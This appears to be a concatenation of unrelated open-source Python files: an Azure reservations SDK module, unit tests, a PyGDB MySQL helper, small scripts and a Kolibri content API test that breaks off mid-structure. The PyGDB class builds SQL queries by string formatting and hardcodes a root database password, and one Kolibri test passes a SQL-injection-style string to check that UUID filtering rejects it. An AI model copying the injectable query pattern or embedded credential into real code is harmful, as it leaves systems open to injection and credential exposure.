response_headers['Retry-After']=self._deserialize('int', response.headers.get('Retry-After'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_post_initial.metadata = {'url': '/providers/Microsoft.Capacity/calculateExchange'} # type: ignore
async def begin_post(
self,
body: "_models.CalculateExchangeRequest",
**kwargs: Any
) -> AsyncLROPoller["_models.CalculateExchangeOperationResultResponse"]:
"""Calculates the refund amounts and price of the new purchases.
Calculates price for exchanging ``Reservations`` if there are no policy errors.
:param body: Request containing purchases and refunds that need to be executed.
:type body: ~azure.mgmt.reservations.models.CalculateExchangeRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either CalculateExchangeOperationResultResponse or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.reservations.models.CalculateExchangeOperationResultResponse]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.CalculateExchangeOperationResultResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._post_initial(
body=body,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('CalculateExchangeOperationResultResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_post.metadata = {'url': '/providers/Microsoft.Capacity/calculateExchange'} # type: ignore
| Azure/azure-sdk-for-python | sdk/reservations/azure-mgmt-reservations/azure/mgmt/reservations/aio/operations/_calculate_exchange_operations.py | Python | mit | 7,926 |
from __future__ import absolute_import
import unittest
import types
if __name__ == "__main__":
from optional import * #imports from package, not sub-module
else:
from .optional import *
from .nulltype import *
class TestNullType(unittest.TestCase):
def test_supertype(self):
self.assert_(isinstance(None, NullType))
self.assert_(isinstance(Optional('a'), NullType))
self.assert_(isinstance(NotPassed, NotPassedType))
self.assert_(isinstance(NotPassed, NullType))
self.assert_(issubclass(type(None), NullType))
self.assert_(issubclass(types.NoneType, NullType))
self.assert_(issubclass(Optional, NullType))
self.assert_(issubclass(NotPassedType, NullType))
class TestOptional(unittest.TestCase):
def setUp(self):
def myfunc(first, second=None, third=Optional(5), fourth=Optional(execute=list)):
#Equivalent: second = deoption(second, 5)
if isinstance(second, type(None)):
second = 5
third = deoption(third, 5)
fourth = deoption(fourth)
return first, second, third, fourth
self.myfunc = myfunc
self.expected = ('a', 5, 5, [])
self.ident = lambda: None
def _option_suite(self, value):
opt = Optional(value)
self.assert_(isinstance(opt, Optional))
self.assert_(isinstance(deoption(opt), type(value)))
self.assertEqual(deoption(opt), value)
def test_optional(self):
self._option_suite('a')
self._option_suite(5)
value = None
self._option_suite(value)
self.assertEqual(deoption(value, 'a'), 'a')
self._option_suite(dict)
self._option_suite(self.ident)
def test_execute(self):
opt = Optional(None, execute=dict)
self.assertEqual(deoption(opt), {})
self.assertEqual(deoption(opt, execute=dict), {})
self.assertEqual(deoption(None, execute=dict), {})
def test_optional_arguments(self):
self.assertEqual(self.myfunc('a'), self.expected)
self.assertEqual(self.myfunc('a', 5), self.expected)
self.assertEqual(self.myfunc('a', second=5), self.expected)
self.assertEqual(self.myfunc('a', 5, 5), self.expected)
self.assertEqual(self.myfunc('a', fourth=[]), self.expected)
def test_edges(self):
self.assertEqual(self.myfunc('a', third=None), self.expected)
def test_exceptions(self):
self.assert_(issubclass(DeoptionError, TypeError))
self.assertRaises(TypeError,
lambda: Optional()
)
self.assertRaises(TypeError,
lambda: Optional(NotPassed, NotPassed)
)
opt = Optional('a')
opt.default = NotPassed
self.assertRaises(DeoptionError,
lambda: opt.deoption()
)
self.assertRaises(DeoptionError,
lambda: deoption(None)
)
self.assertRaises(DeoptionError,
lambda: deoption(None, NotPassed, NotPassed)
)
self.assertRaises(DeoptionError,
lambda: deoption(NotPassed)
)
if __name__ == "__main__":
unittest.main() | OaklandPeters/optional | optional/test_optional.py | Python | mit | 3,279 |
# coding=utf-8
import pymysql
import PyGdbUtil
class PyGdbDb:
# 初始化: 连接数据库
def __init__(self, host, port, dbname, user, passwd):
self.project = None
self.table_prefix = None
try:
self.connection = pymysql.connect(
host=host, port=int(port), user=user, password=passwd, db=dbname, charset="utf8mb4")
self.cursor = self.connection.cursor()
except Exception as e_con:
print '数据库连接错误, 程序中止'
print e_con
exit(-1)
def test(self):
print '正在测试数据库连接'
print '数据库连接: ' + str(self.connection.get_host_info()) if self.connection else '数据库连接异常'
print '数据库游标: ' + str(self.cursor) if self.cursor else '数据库游标异常'
print '数据库连接测试完毕'
print '检查表 aabb 是否存在'
if self.exist_table('aabb'):
print '存在'
else:
print '不存在'
print '初始化项目 example'
self.init_project('example', 'example_')
self.new_project()
PyGdbUtil.log(0, '初始化完毕')
# 初始化项目
def init_project(self, project_name, table_prefix):
self.project = project_name
self.table_prefix = table_prefix
# 检测是否存在该项目 不存在->创建 返回True; 存在->返回 False
def new_project(self):
if not self.table_prefix:
PyGdbUtil.log(2, '未指定数据库前缀')
exist_project = self.exist_table(self.table_prefix + 'BreakPoint')
# 创建数据库表
if not exist_project:
self.create_table(self.table_prefix + "BreakPoint(bid INT AUTO_INCREMENT primary key, pid INT, lineNumber INT, funcName TEXT, funcList TEXT)")
self.create_table(self.table_prefix + "PStackSize(pid INT, tid INT, stackSize INT, pass TINYINT)")
self.create_table(self.table_prefix + "FStackSize(pid INT, tid INT, fid INT, stackSize INT)")
self.create_table(self.table_prefix + "FrameVariable(bid INT, varName CHAR, varValue TEXT, varSize INT)")
self.create_table(self.table_prefix + "FuncAdjacencyList(pid INT, tid INT, parFid INT, fid INT, cnt INT)")
self.create_table(self.table_prefix + "Function(fid INT, funcName CHAR(30))")
self.create_table(self.table_prefix + "TestCase(tid INT AUTO_INCREMENT primary key, testStr TEXT)")
self.commit()
return True
else:
return False
def clear_project(self):
if not self.table_prefix:
PyGdbUtil.log(2, '未指定数据库前缀')
exist_project = self.exist_table(self.table_prefix + 'BreakPoint')
if exist_project:
self.drop_table(self.table_prefix + "BreakPoint")
self.drop_table(self.table_prefix + "PStackSize")
self.drop_table(self.table_prefix + "FStackSize")
self.drop_table(self.table_prefix + "FrameVariable")
self.drop_table(self.table_prefix + "FuncAdjacencyList")
self.drop_table(self.table_prefix + "Function")
self.drop_table(self.table_prefix + "TestCase")
self.commit()
return True
else:
return False
# 插入测试用例
def insert_test_case(self, test_str):
self.execute("insert into " + self.table_prefix + "TestCase(testStr) VALUES('%s')" % test_str)
# 插入程序断点
def insert_breakpoint(self, pid, line_number, func_name):
# return # 测试
PyGdbUtil.log(0, str(pid) + " " + str(line_number) + " " + str(func_name))
self.execute("insert into " + self.table_prefix +
"BreakPoint(pid, lineNumber, funcName) VALUES (%s, %s, '%s')" % (pid, line_number, func_name))
# 插入函数
def inset_function(self, fid, func_name):
self.execute('insert into ' + self.table_prefix +
'Function(fid, funcName) VALUES (%s, "%s")' % (fid, func_name))
# 插入一个栈帧变量信息
def insert_frame_var(self, bid, var_name, var_value, var_size):
self.execute('insert into ' + self.table_prefix +
'FrameVariable(bid, varName, varValue, varSize) ' +
'VALUES (%s, "%s", "%s", %s)' % (bid, var_name, var_value, var_size))
# 插入栈帧大小
def insert_frame_stack_size(self, pid, tid, fid, size):
self.execute('insert into ' + self.table_prefix +
'FStackSize(pid, tid, fid, stackSize) VALUES (%s, %s, %s, %s)' %
(pid, tid, fid, size))
# 插入最大栈帧大小
def insert_max_stack_size(self, pid, tid, size):
self.execute('insert into ' + self.table_prefix +
'PStackSize(pid, tid, stackSize) VALUES (%s, %s, %s)' %(pid, tid, size))
# 根据函数名称获取 fid
def get_function_fid_by_name(self, func_name):
self.execute('select fid from ' + self.table_prefix + 'Function where funcName=' + func_name)
fetch_one = self.cursor.fetchone()
print "获取函数id: " + fetch_one
return fetch_one[0]
# 根据bid获取fid
def get_fid_by_bid(self, bid):
self.execute('select funcName from ' + self.table_prefix + 'BreakPoint where bid=' + str(bid))
fetch_one = self.cursor.fetchone()
fid = self.get_fid_by_func_name(str(fetch_one[0]))
return fid
# 根据函数名获取 fid
def get_fid_by_func_name(self, func_name):
self.execute('select fid from ' + self.table_prefix + 'Function where funcName="%s"' % (str(func_name)))
return self.cursor.fetchone()[0]
# 数据库中插入断点
def info_breakpoint_handler(self, pid, gdb_info_breakpoint):
ss = gdb_info_breakpoint.split("\n")
for s in ss:
if 0 < s.find("breakpoint keep y"):
s2 = s.split()
s3 = s2[8].split(":")
self.insert_breakpoint(pid, s3[1], s2[6])
# 添加有向边 a-->b
def insert_edge(self, pid, tid, func_name_a, func_name_b):
fid_a = self.get_fid_by_func_name(func_name_a)
fid_b = self.get_fid_by_func_name(func_name_b)
try:
self.execute('select cnt from ' + self.table_prefix +
'FuncAdjacencyList where pid=%s and tid=%s and parFid=%s and fid=%s' %
(pid, tid, fid_a, fid_b))
cnt = int(self.cursor.fetchone()[0]) + 1
self.execute('update ' + self.table_prefix +
'FuncAdjacencyList set cnt=%s where pid=%s and tid=%s and parFid=%s and fid=%s' %
(pid, tid, cnt, fid_a, fid_b))
except Exception:
cnt = 1
self.execute('insert into ' + self.table_prefix +
'FuncAdjacencyList(pid, tid, parFid, fid, cnt) VALUES (%s, %s, %s, %s, %s)' %
(pid, tid, fid_a, fid_b, cnt))
# 根据 gdb(info b) 的信息获取函数列表
def get_function_list(self, break_info):
func_list = []
string_list = break_info.split('\n')[1:]
for line in string_list:
word = line.split()
if len(word) >= 6:
func_list.append(word[6])
return func_list
# 将给出的函数列表插入数据库中
def insert_function_list(self, func_list):
fid = 0
func_list = list(set(func_list)) # 去重
for func in func_list:
fid += 1
self.inset_function(fid, func)
# 检查是否存在一张表
def exist_table(self, table_name):
try:
self.execute('select * from ' + table_name)
return True
except Exception:
return False
# 创建表
def create_table(self, table_name):
try:
PyGdbUtil.log(0, "创建表" + table_name)
self.execute("create table if not exists " + table_name)
except Exception as e:
# print e
PyGdbUtil.log(2, "创建表" + table_name + "失败! 请检查数据表前缀是否有非法字符.")
# 删除表
def drop_table(self, table_name):
try:
PyGdbUtil.log(0, "删除表" + table_name)
self.execute('drop table if exists ' + table_name)
except Exception as e:
print e
PyGdbUtil.log(2, '删除表失败!')
# 获取测试样例
def get_test_case_by_tid(self, tid):
self.execute("SELECT testStr FROM " + self.table_prefix + "TestCase WHERE tid='%s'" % tid)
return self.cursor.fetchone()[0]
# 获取测试样例总数
def get_test_case_cnt(self):
self.execute('SELECT max(tid) FROM ' + self.table_prefix + 'TestCase')
return int(self.cursor.fetchone()[0])
# 获取指定程序的断点列表
def get_breakpoint_list(self, pid):
self.execute('SELECT lineNumber FROM ' + self.table_prefix + 'BreakPoint WHERE pid="%s"' % pid)
all = self.cursor.fetchall()
return [x[0] for x in all]
# 执行 sql 语句
def execute(self, sql_cmd):
return self.cursor.execute(sql_cmd)
# commit 操作
def commit(self):
self.connection.commit()
"""
==================================================================
下方是 RestFul API 直接需要用到的 api
我擦, 这个好像应该放到另一个工程里面 - -#
==================================================================
"""
# getWorstStackSize(String program String t1){} input1+program getWorstStackSize(){}
# tid + pid --> Worst Stack Size
def api_worst_stack_size(self, pid, tid):
pass
def api_max_stack_size(self, pid, tid, fid):
pass
# 给出正确程序的pid 以及比较程序的 pid, 以及测试用例集合(tid列表), 返回程序执行成功与否的TF表
def api_result(self, correct_pid, test_pid, tid_list):
pass
# 返回程序断点列表
def api_breakpoint_list(self, pid, tid):
pass
# 断点处函数栈列表
def api_breakpoint_func_list(self, pid, breakpoint):
pass
# 断点处栈帧信息
def api_breakpoint_frame_info(self, pid, breakpoint):
pass
# 返回函数调用图的邻接表
def api_function_graph(self, pid, tid):
pass
# 返回函数列表
def api_function_list(self, pid):
pass
if __name__ == '__main__':
print "PyGDB Database 测试模式"
try:
dbc = PyGdbDb('127.0.0.1', '3306', 'pygdb', 'root', 'Sbdljw1992')
print '数据库连接成功'
dbc.test()
dbc.connection.close()
print '数据库连接断开成功'
except Exception as e:
print '严重错误: ' + str(e)
exit(-1)
| Jecvay/PyGDB | PyGdbDb.py | Python | mit | 10,962 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import root
import j
| tonghuashuai/OnlyBoard | controller/_url.py | Python | mit | 68 |
#!../../../.env/bin/python
import os
import numpy as np
import time
a = np.array([
[1,0,3],
[0,2,1],
[0.1,0,0],
])
print a
row = 1
col = 2
print a[row][col]
assert a[row][col] == 1
expected_max_rows = [0, 1, 0]
expected_max_values = [1, 2, 3]
print 'expected_max_rows:', expected_max_rows
print 'expected_max_values:', expected_max_values
t0 = time.time()
actual_max_rows = list(np.argmax(a, axis=0))
td = time.time() - t0
actual_max_values = list(np.amax(a, axis=0))
print 'td:', round(td, 4)
print 'actual_max_rows:', actual_max_rows
print 'actual_max_values:', actual_max_values
assert actual_max_rows == expected_max_rows
assert actual_max_values == expected_max_values
| chrisspen/homebot | src/test/max_column/test_max_column.py | Python | mit | 690 |
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns(
'',
url(r'', include('frontpage.urls')),
url(r'^auth/', include('social.apps.django_app.urls', namespace='social')),
url(r'^admin/', include(admin.site.urls)),
url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page': '/'}, name='logout'),
)
| cncdnua/cncdnua | cncdnua/cncdnua/urls.py | Python | mit | 405 |
import fetchopenfmri.fetch
| wiheto/fetchopenfmri | fetchopenfmri/__init__.py | Python | mit | 28 |
"""
To run this test, type this in command line <kolibri manage test -- kolibri.core.content>
"""
import datetime
import unittest
import uuid
import mock
import requests
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.test import TestCase
from django.utils import timezone
from le_utils.constants import content_kinds
from rest_framework import status
from rest_framework.test import APITestCase
from kolibri.core.auth.models import Facility
from kolibri.core.auth.models import FacilityUser
from kolibri.core.auth.test.helpers import provision_device
from kolibri.core.content import models as content
from kolibri.core.content.test.test_channel_upgrade import ChannelBuilder
from kolibri.core.device.models import DevicePermissions
from kolibri.core.device.models import DeviceSettings
from kolibri.core.logger.models import ContentSessionLog
from kolibri.core.logger.models import ContentSummaryLog
DUMMY_PASSWORD = "password"
class ContentNodeTestBase(object):
"""
Basecase for content metadata methods
"""
def test_get_prerequisites_for(self):
"""
test the directional characteristic of prerequisite relationship
"""
c1 = content.ContentNode.objects.get(title="c1")
root = content.ContentNode.objects.get(title="root")
# if root is the prerequisite of c1
expected_output = content.ContentNode.objects.filter(title__in=["root"])
actual_output = content.ContentNode.objects.filter(prerequisite_for=c1)
self.assertEqual(set(expected_output), set(actual_output))
# then c1 should not be the prerequisite of root
unexpected_output = content.ContentNode.objects.filter(title__in=["c1"])
actual_output = content.ContentNode.objects.filter(prerequisite_for=root)
self.assertNotEqual(set(actual_output), set(unexpected_output))
def test_get_has_prerequisites(self):
"""
test the directional characteristic of prerequisite relationship
"""
c1 = content.ContentNode.objects.get(title="c1")
root = content.ContentNode.objects.get(title="root")
# if root is the prerequisite of c1
expected_output = content.ContentNode.objects.filter(title__in=["c1"])
actual_output = content.ContentNode.objects.filter(has_prerequisite=root)
self.assertEqual(set(expected_output), set(actual_output))
# then c1 should not be the prerequisite of root
unexpected_output = content.ContentNode.objects.filter(title__in=["root"])
actual_output = content.ContentNode.objects.filter(has_prerequisite=c1)
self.assertNotEqual(set(actual_output), set(unexpected_output))
def test_get_all_related(self):
"""
test the nondirectional characteristic of related relationship
"""
c1 = content.ContentNode.objects.get(title="c1")
c2 = content.ContentNode.objects.get(title="c2")
# if c1 is related to c2
expected_output = content.ContentNode.objects.filter(title__in=["c2"])
actual_output = content.ContentNode.objects.filter(related=c1)
self.assertEqual(set(expected_output), set(actual_output))
# then c2 should be related to c1
expected_output = content.ContentNode.objects.filter(title__in=["c1"])
actual_output = content.ContentNode.objects.filter(related=c2)
self.assertEqual(set(expected_output), set(actual_output))
def test_descendants_of_kind(self):
p = content.ContentNode.objects.get(title="root")
expected_output = content.ContentNode.objects.filter(title__in=["c1"])
actual_output = p.get_descendants(include_self=False).filter(
kind=content_kinds.VIDEO
)
self.assertEqual(set(expected_output), set(actual_output))
def test_get_top_level_topics(self):
p = content.ContentNode.objects.get(title="root")
expected_output = content.ContentNode.objects.filter(
parent=p, kind=content_kinds.TOPIC
)
actual_output = (
content.ContentNode.objects.get(title="root")
.get_children()
.filter(kind=content_kinds.TOPIC)
)
self.assertEqual(set(expected_output), set(actual_output))
def test_tag_str(self):
# test for ContentTag __str__
p = content.ContentTag.objects.get(tag_name="tag_2")
self.assertEqual(str(p), "tag_2")
def test_lang_str(self):
# test for Language __str__
p = content.Language.objects.get(lang_code="en")
self.assertEqual(str(p), "English-Test")
def test_channelmetadata_str(self):
# test for ChannelMetadata __str__
p = content.ChannelMetadata.objects.get(name="testing")
self.assertEqual(str(p), "testing")
def test_tags(self):
root_tag_count = content.ContentNode.objects.get(title="root").tags.count()
self.assertEqual(root_tag_count, 3)
c1_tag_count = content.ContentNode.objects.get(title="c1").tags.count()
self.assertEqual(c1_tag_count, 1)
c2_tag_count = content.ContentNode.objects.get(title="c2").tags.count()
self.assertEqual(c2_tag_count, 1)
c2c1_tag_count = content.ContentNode.objects.get(title="c2c1").tags.count()
self.assertEqual(c2c1_tag_count, 0)
def test_local_files(self):
self.assertTrue(
content.LocalFile.objects.filter(
id="9f9438fe6b0d42dd8e913d7d04cfb2b2"
).exists()
)
self.assertTrue(
content.LocalFile.objects.filter(
id="725257a0570044acbd59f8cf6a68b2be"
).exists()
)
self.assertTrue(
content.LocalFile.objects.filter(
id="e00699f859624e0f875ac6fe1e13d648"
).exists()
)
self.assertTrue(
content.LocalFile.objects.filter(
id="4c30dc7619f74f97ae2ccd4fffd09bf2"
).exists()
)
self.assertTrue(
content.LocalFile.objects.filter(
id="8ad3fffedf144cba9492e16daec1e39a"
).exists()
)
def test_delete_tree(self):
channel = content.ChannelMetadata.objects.first()
channel_id = channel.id
channel.delete_content_tree_and_files()
self.assertFalse(
content.ContentNode.objects.filter(channel_id=channel_id).exists()
)
self.assertFalse(content.File.objects.all().exists())
class ContentNodeQuerysetTestCase(TestCase):
fixtures = ["content_test.json"]
the_channel_id = "6199dde695db4ee4ab392222d5af1e5c"
@classmethod
def setUpTestData(cls):
provision_device()
cls.facility = Facility.objects.create(name="facility")
cls.admin = FacilityUser.objects.create(username="admin", facility=cls.facility)
cls.admin.set_password(DUMMY_PASSWORD)
cls.admin.save()
cls.facility.add_admin(cls.admin)
def test_filter_uuid(self):
content_ids = content.ContentNode.objects.values_list("id", flat=True)
self.assertEqual(
content.ContentNode.objects.filter_by_uuids(content_ids).count(),
len(content_ids),
)
def test_filter_uuid_bad_uuid(self):
content_ids = list(content.ContentNode.objects.values_list("id", flat=True))
content_ids[0] = '7d1bOR"1"="1"d08e29c36115f1af3da99'
self.assertEqual(
content.ContentNode.objects.filter_by_uuids(content_ids).count(), 0
)
kind_activity_map = {
content_kinds.EXERCISE: "practice",
content_kinds.VIDEO: "watch",
content_kinds.AUDIO: "listen",
content_kinds.DOCUMENT: "read",
content_kinds.HTML5: "explore",
}
def infer_learning_activity(kind):
activity = kind_activity_map.get(kind)
if activity:
return [activity]
return []
class ContentNodeAPITestCase(APITestCase):
"""
Testcase for content API methods
"""
fixtures = ["content_test.json"]
the_channel_id = "6199dde695db4ee4ab392222d5af1e5c"
@classmethod
def setUpTestData(cls):
provision_device()
cls.facility = Facility.objects.create(name="facility")
cls.admin = FacilityUser.objects.create(username="admin", facility=cls.facility)
cls.admin.set_password(DUMMY_PASSWORD)
cls.admin.save()
cls.facility.add_admin(cls.admin)
def test_prerequisite_for_filter(self):
c1_id = content.ContentNode.objects.get(title="c1").id
response = self.client.get(
reverse("kolibri:core:contentnode-list"), data={"prerequisite_for": c1_id}
)
self.assertEqual(response.data[0]["title"], "root")
def test_has_prerequisite_filter(self):
root_id = content.ContentNode.objects.get(title="root").id
response = self.client.get(
reverse("kolibri:core:contentnode-list"), data={"has_prerequisite": root_id}
)
self.assertEqual(response.data[0]["title"], "c1")
def test_related_filter(self):
c1_id = content.ContentNode.objects.get(title="c1").id
response = self.client.get(
reverse("kolibri:core:contentnode-list"), data={"related": c1_id}
)
self.assertEqual(response.data[0]["title"], "c2")
def map_language(self, lang):
if lang:
return {
f: getattr(lang, f)
for f in [
"id",
"lang_code",
"lang_subcode",
"lang_name",
"lang_direction",
]
}
def _assert_node(self, actual, expected):
assessmentmetadata = (
expected.assessmentmetadata.all()
.values(
"assessment_item_ids",
"number_of_assessments",
"mastery_model",
"randomize",
"is_manipulable",
"contentnode",
)
.first()
)
files = []
for f in expected.files.all():
"local_file__id",
"local_file__available",
"local_file__file_size",
"local_file__extension",
"lang_id",
file = {}
for field in [
"id",
"priority",
"preset",
"supplementary",
"thumbnail",
]:
file[field] = getattr(f, field)
file["checksum"] = f.local_file_id
for field in [
"available",
"file_size",
"extension",
]:
file[field] = getattr(f.local_file, field)
file["lang"] = self.map_language(f.lang)
file["storage_url"] = f.get_storage_url()
files.append(file)
self.assertEqual(
actual,
{
"id": expected.id,
"available": expected.available,
"author": expected.author,
"channel_id": expected.channel_id,
"coach_content": expected.coach_content,
"content_id": expected.content_id,
"description": expected.description,
"duration": None,
"learning_activities": infer_learning_activity(expected.kind),
"kind": expected.kind,
"lang": self.map_language(expected.lang),
"license_description": expected.license_description,
"license_name": expected.license_name,
"license_owner": expected.license_owner,
"num_coach_contents": expected.num_coach_contents,
"options": expected.options,
"parent": expected.parent_id,
"sort_order": expected.sort_order,
"title": expected.title,
"lft": expected.lft,
"rght": expected.rght,
"tree_id": expected.tree_id,
"ancestors": list(expected.get_ancestors().values("id", "title")),
"tags": list(
expected.tags.all()
.order_by("tag_name")
.values_list("tag_name", flat=True)
),
"assessmentmetadata": assessmentmetadata,
"is_leaf": expected.kind != "topic",
"files": files,
},
)
def _assert_nodes(self, data, nodes):
for actual, expected in zip(data, nodes):
self._assert_node(actual, expected)
def test_contentnode_list(self):
root = content.ContentNode.objects.get(title="root")
nodes = root.get_descendants(include_self=True).filter(available=True)
expected_output = len(nodes)
response = self.client.get(reverse("kolibri:core:contentnode-list"))
self.assertEqual(len(response.data), expected_output)
self._assert_nodes(response.data, nodes)
@unittest.skipIf(
getattr(settings, "DATABASES")["default"]["ENGINE"]
== "django.db.backends.postgresql",
"Skipping postgres as not as vulnerable to large queries and large insertions are less performant",
)
def test_contentnode_list_long(self):
# This will make > 1000 nodes which should test our ancestor batching behaviour
builder = ChannelBuilder(num_children=10)
builder.insert_into_default_db()
content.ContentNode.objects.update(available=True)
nodes = content.ContentNode.objects.filter(available=True)
expected_output = len(nodes)
self.assertGreater(expected_output, 1000)
response = self.client.get(reverse("kolibri:core:contentnode-list"))
self.assertEqual(len(response.data), expected_output)
self._assert_nodes(response.data, nodes)
def _recurse_and_assert(self, data, nodes, recursion_depth=0):
for actual, expected in zip(data, nodes):
children = actual.pop("children", None)
self._assert_node(actual, expected)
if children:
child_nodes = content.ContentNode.objects.filter(
available=True, parent=expected
)
if children["more"] is None:
self.assertEqual(len(child_nodes), len(children["results"]))
else:
self.assertGreater(len(child_nodes), len(children["results"]))
self.assertEqual(children["more"]["id"], expected.id)
self.assertEqual(
children["more"]["params"]["lft__gt"], child_nodes[24].rght
)
self.assertEqual(
children["more"]["params"]["depth"], 2 - recursion_depth
)
self._recurse_and_assert(
children["results"],
child_nodes,
recursion_depth=recursion_depth + 1,
)
def test_contentnode_tree(self):
root = content.ContentNode.objects.get(title="root")
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id})
)
self._recurse_and_assert([response.data], [root])
@unittest.skipIf(
getattr(settings, "DATABASES")["default"]["ENGINE"]
== "django.db.backends.postgresql",
"Skipping postgres as not as vulnerable to large queries and large insertions are less performant",
)
def test_contentnode_tree_long(self):
builder = ChannelBuilder(levels=2, num_children=30)
builder.insert_into_default_db()
content.ContentNode.objects.all().update(available=True)
root = content.ContentNode.objects.get(id=builder.root_node["id"])
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id})
)
self._recurse_and_assert([response.data], [root])
def test_contentnode_tree_depth_1(self):
root = content.ContentNode.objects.get(title="root")
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id}),
data={"depth": 1},
)
self._recurse_and_assert([response.data], [root])
@unittest.skipIf(
getattr(settings, "DATABASES")["default"]["ENGINE"]
== "django.db.backends.postgresql",
"Skipping postgres as not as vulnerable to large queries and large insertions are less performant",
)
def test_contentnode_tree_lft__gt(self):
builder = ChannelBuilder(levels=2, num_children=30)
builder.insert_into_default_db()
content.ContentNode.objects.all().update(available=True)
root = content.ContentNode.objects.get(id=builder.root_node["id"])
lft__gt = content.ContentNode.objects.filter(parent=root)[24].rght
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id}),
data={"lft__gt": lft__gt},
)
self.assertEqual(len(response.data["children"]["results"]), 5)
self.assertIsNone(response.data["children"]["more"])
first_node = content.ContentNode.objects.filter(parent=root)[25]
self._recurse_and_assert(
[response.data["children"]["results"][0]], [first_node], recursion_depth=1
)
@unittest.skipIf(
getattr(settings, "DATABASES")["default"]["ENGINE"]
== "django.db.backends.postgresql",
"Skipping postgres as not as vulnerable to large queries and large insertions are less performant",
)
def test_contentnode_tree_more(self):
builder = ChannelBuilder(levels=2, num_children=30)
builder.insert_into_default_db()
content.ContentNode.objects.all().update(available=True)
root = content.ContentNode.objects.get(id=builder.root_node["id"])
response = self.client.get(
reverse("kolibri:core:contentnode_tree-detail", kwargs={"pk": root.id})
)
first_child = response.data["children"]["results"][0]
self.assertEqual(first_child["children"]["more"]["params"]["depth"], 1)
nested_page_response = self.client.get(
reverse(
"kolibri:core:contentnode_tree-detail",
kwargs={"pk": first_child["children"]["more"]["id"]},
),
data=first_child["children"]["more"]["params"],
)
self.assertEqual(len(nested_page_response.data["children"]["results"]), 5)
self.assertIsNone(nested_page_response.data["children"]["more"])
@mock.patch("kolibri.core.content.api.get_channel_stats_from_studio")
def test_contentnode_granular_network_import(self, stats_mock):
c1 = content.ContentNode.objects.get(title="root")
c1_id = c1.id
c2_id = content.ContentNode.objects.get(title="c1").id
c3_id = content.ContentNode.objects.get(title="c2").id
content.ContentNode.objects.all().update(available=False)
stats = {
c1_id: {
"total_resources": 2,
"coach_content": False,
"num_coach_contents": 0,
},
c2_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
c3_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
}
stats_mock.return_value = stats
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id})
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "root",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 2,
"on_device_resources": 0,
"coach_content": False,
"importable": True,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
"ancestors": list(c1.get_ancestors().values("id", "title")),
"children": [
{
"id": c2_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
{
"id": c3_id,
"title": "c2",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
],
},
)
@mock.patch("kolibri.core.content.api.get_channel_stats_from_disk")
def test_contentnode_granular_local_import(self, stats_mock):
content.LocalFile.objects.update(available=False)
content.ContentNode.objects.update(available=False)
c1 = content.ContentNode.objects.get(title="root")
c1_id = c1.id
c2_id = content.ContentNode.objects.get(title="c1").id
c3_id = content.ContentNode.objects.get(title="c2").id
stats = {
c1_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
c3_id: {
"total_resources": 1,
"coach_content": False,
"num_coach_contents": 0,
},
}
stats_mock.return_value = stats
response = self.client.get(
reverse("kolibri:core:contentnode_granular-detail", kwargs={"pk": c1_id}),
{"importing_from_drive_id": "123"},
)
self.assertEqual(
response.data,
{
"id": c1_id,
"title": "root",
"kind": "topic",
"is_leaf": False,
"available": False,
"total_resources": 1,
"on_device_resources": 0,
"importable": True,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
"ancestors": list(c1.get_ancestors().values("id", "title")),
"children": [
{
"id": c2_id,
"title": "c1",
"kind": "video",
"is_leaf": True,
"available": False,
"total_resources": 0,
"on_device_resources": 0,
"importable": False,
"coach_content": False,
"num_coach_contents": 0,
"new_resource": False,
"num_new_resources": 0,
"updated_resource": False,
},
{
